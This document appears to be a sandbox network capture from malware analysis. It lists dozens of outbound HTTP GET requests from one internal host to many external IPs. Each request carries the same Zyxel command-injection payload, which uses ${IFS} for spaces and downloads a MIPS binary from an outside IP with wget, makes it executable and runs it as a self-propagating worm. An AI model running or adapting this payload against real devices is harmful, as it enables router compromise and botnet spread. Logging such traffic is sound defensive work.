                                            Feb 2, 2024 06:21:06.499283075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2669192.168.2.1547282191.161.102.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499337912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2670192.168.2.154172820.42.51.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499356031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2671192.168.2.153831432.119.51.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499407053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2672192.168.2.1536534143.87.211.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499454975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2673192.168.2.154712660.41.11.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499504089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2674192.168.2.1547840122.193.140.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499536037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2675192.168.2.155687638.96.226.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499588013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2676192.168.2.154053867.39.84.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499608994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2677192.168.2.1543206185.45.174.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499666929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2678192.168.2.1556532152.138.93.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499701023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2679192.168.2.1544976217.160.52.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499718904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2680192.168.2.1550770213.213.138.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499778032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2681192.168.2.154168691.190.221.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499811888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2682192.168.2.1542742206.189.116.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499844074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2683192.168.2.1550126143.175.36.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499871016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2684192.168.2.1543466122.19.183.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499918938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2685192.168.2.1549660220.229.8.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499960899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2686192.168.2.155496069.166.93.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500003099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2687192.168.2.153336083.251.134.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500044107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2688192.168.2.155206881.195.24.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500087023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2689192.168.2.1547000179.148.66.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500140905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2690192.168.2.154413675.99.221.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500169992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2691192.168.2.154804095.43.167.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500216961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2692192.168.2.1552166168.242.195.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500241041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2693192.168.2.1554454119.234.200.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500283957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2694192.168.2.1554858143.32.12.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500315905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2695192.168.2.1545270124.169.9.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500360012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2696192.168.2.155397038.242.191.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500416040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2697192.168.2.1560326131.112.24.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500444889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2698192.168.2.15492949.206.158.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500490904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2699192.168.2.1559880131.99.105.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500525951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2700192.168.2.1544856184.197.92.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500566006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2701192.168.2.1542160104.240.17.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500622988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2702192.168.2.154288418.4.65.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500665903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2703192.168.2.1535410211.249.19.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500711918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2704192.168.2.154716668.5.72.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500741959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2705192.168.2.155134847.102.89.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500778913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2706192.168.2.153631482.35.125.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500828981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2707192.168.2.154210654.102.180.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500871897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2708192.168.2.153596278.162.140.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500900030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2709192.168.2.153409634.13.223.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500921011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2710192.168.2.1559736184.22.135.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.500977039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2711192.168.2.153342268.49.209.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501015902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2712192.168.2.156058076.61.151.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501051903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2713192.168.2.155887696.205.15.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501087904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2714192.168.2.1542002180.62.249.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501123905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2715192.168.2.1539898173.204.187.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501157045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2716192.168.2.1558280165.181.229.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501187086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2717192.168.2.1533576198.21.165.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501236916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2718192.168.2.1539406134.27.251.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501290083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2719192.168.2.154125666.251.32.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501327038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2720192.168.2.1551696210.133.105.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501348019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2721192.168.2.1558626153.188.182.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501393080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2722192.168.2.156054441.245.222.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501424074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2723192.168.2.1540430116.74.177.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501451015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2724192.168.2.1558166113.119.129.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501507044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2725192.168.2.1551136157.205.140.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501527071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2726192.168.2.1546212123.183.125.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501570940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2727192.168.2.1551478187.81.0.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501604080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2728192.168.2.1546906195.35.172.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501646996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2729192.168.2.1557686189.129.236.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501677036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2730192.168.2.154688442.69.46.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501703978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2731192.168.2.154889273.209.98.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501735926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2732192.168.2.15494402.77.73.191443
                                            TimestampBytes transferredDirectionData
